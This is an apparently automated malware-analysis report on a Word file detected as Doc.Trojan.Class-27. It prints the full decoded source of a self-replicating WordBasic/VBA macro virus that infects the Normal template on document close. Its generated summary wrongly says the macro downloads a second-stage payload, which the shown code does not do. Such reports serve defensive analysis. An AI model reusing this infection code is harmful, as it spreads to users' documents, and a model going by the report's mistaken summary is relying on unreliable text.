MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic AutoClose macro that is designed to execute when the document is closed. This macro attempts to download and execute a second-stage payload from a temporary file path. The presence of the AutoClose macro and the ClamAV detection strongly indicate malicious intent, likely for delivering further malware.
Heuristics 4
-
ClamAV: Doc.Trojan.Class-27 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-27
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7376 bytes |
SHA-256: 3a2f64b6fc35694e55a1e749daf0ef17c4c12406605f7c47f3c7756a45dccd80 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-27
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoClose()
If Year(Now) = 2001 Then MsgBox "Welcome to the 21st Century", 0, "The True Begining"
name1 = "c:\windows\temp\" & Application.UserName & ".tmp"
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
ActDoc = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
NormTemp = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If NormTemp = 79 Then GoTo out1
If NormTemp <> 79 Then
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
With host.codemodule
For Countloop1 = 1 To 1000
On Error GoTo Done1
.deletelines 1
Next Countloop1
Done1:
End With
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
ActiveDocument.VBProject.VBComponents.Item(1).Export name1
host.codemodule.AddFromFile (name1)
With host.codemodule
For Countloop2 = 1 To 4
.deletelines 1
Next Countloop2
.replaceline 1, "Sub AutoClose()"
.replaceline 34, "host.codemodule.AddFromFile (" & Chr(34) & name1 & Chr(34) & ")"
End With
End If
out1:
If ActDoc <> 79 Then
Set host = ActiveDocument.VBProject.VBComponents.Item(1)
host.codemodule.AddFromFile ("c:\windows\temp\Costin Raiu.tmp")
With host.codemodule
For Countloop3 = 1 To 4
.deletelines 1
Next Countloop3
End With
End If
End Sub
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
' Processing file: /opt/analyzer/scan_staging/cf6f27cd096e4c7cbfbcb4bf7a8d41c7.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8602 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' Ld Now
' ArgsLd Year 0x0001
' LitDI2 0x07D1
' Eq
' If
' BoSImplicit
' LitStr 0x001B "Welcome to the 21st Century"
' LitDI2 0x0000
' LitStr 0x0011 "The True Begining"
' ArgsCall MsgBox 0x0003
' EndIf
' Line #2:
' LitStr 0x0010 "c:\windows\temp\"
' Ld Application
' MemLd UserName
' Concat
' LitStr 0x0004 ".tmp"
' Concat
' St name1
' Line #3:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #4:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #5:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St ActDoc
' Line #6:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St NormTemp
' Line #7:
' Ld NormTemp
' LitDI2 0x004F
' Eq
' If
' BoSImplicit
' GoTo out1
' EndIf
' Line #8:
' Ld NormTemp
' LitDI2 0x004F
' Ne
' IfBlock
' Line #9:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set host
' Line #10:
' StartWithExpr
' Ld host
' MemLd codemodule
' With
' Line #11:
' StartForVariable
' Ld Countloop1
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x03E8
' For
' Line #12:
' OnError Done1
' Line #13:
' LitDI2 0x0001
' ArgsMemCallWith deletelines 0x0001
' Line #14:
' StartForVariable
' Ld Countloop1
' EndForVariable
' NextVar
' Line #15:
' Label Done1
' Line #16:
' EndWith
' Line #17:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set host
' Line #18:
' Ld host
' MemLd New
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemSt New
' Line #19:
' Ld name1
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.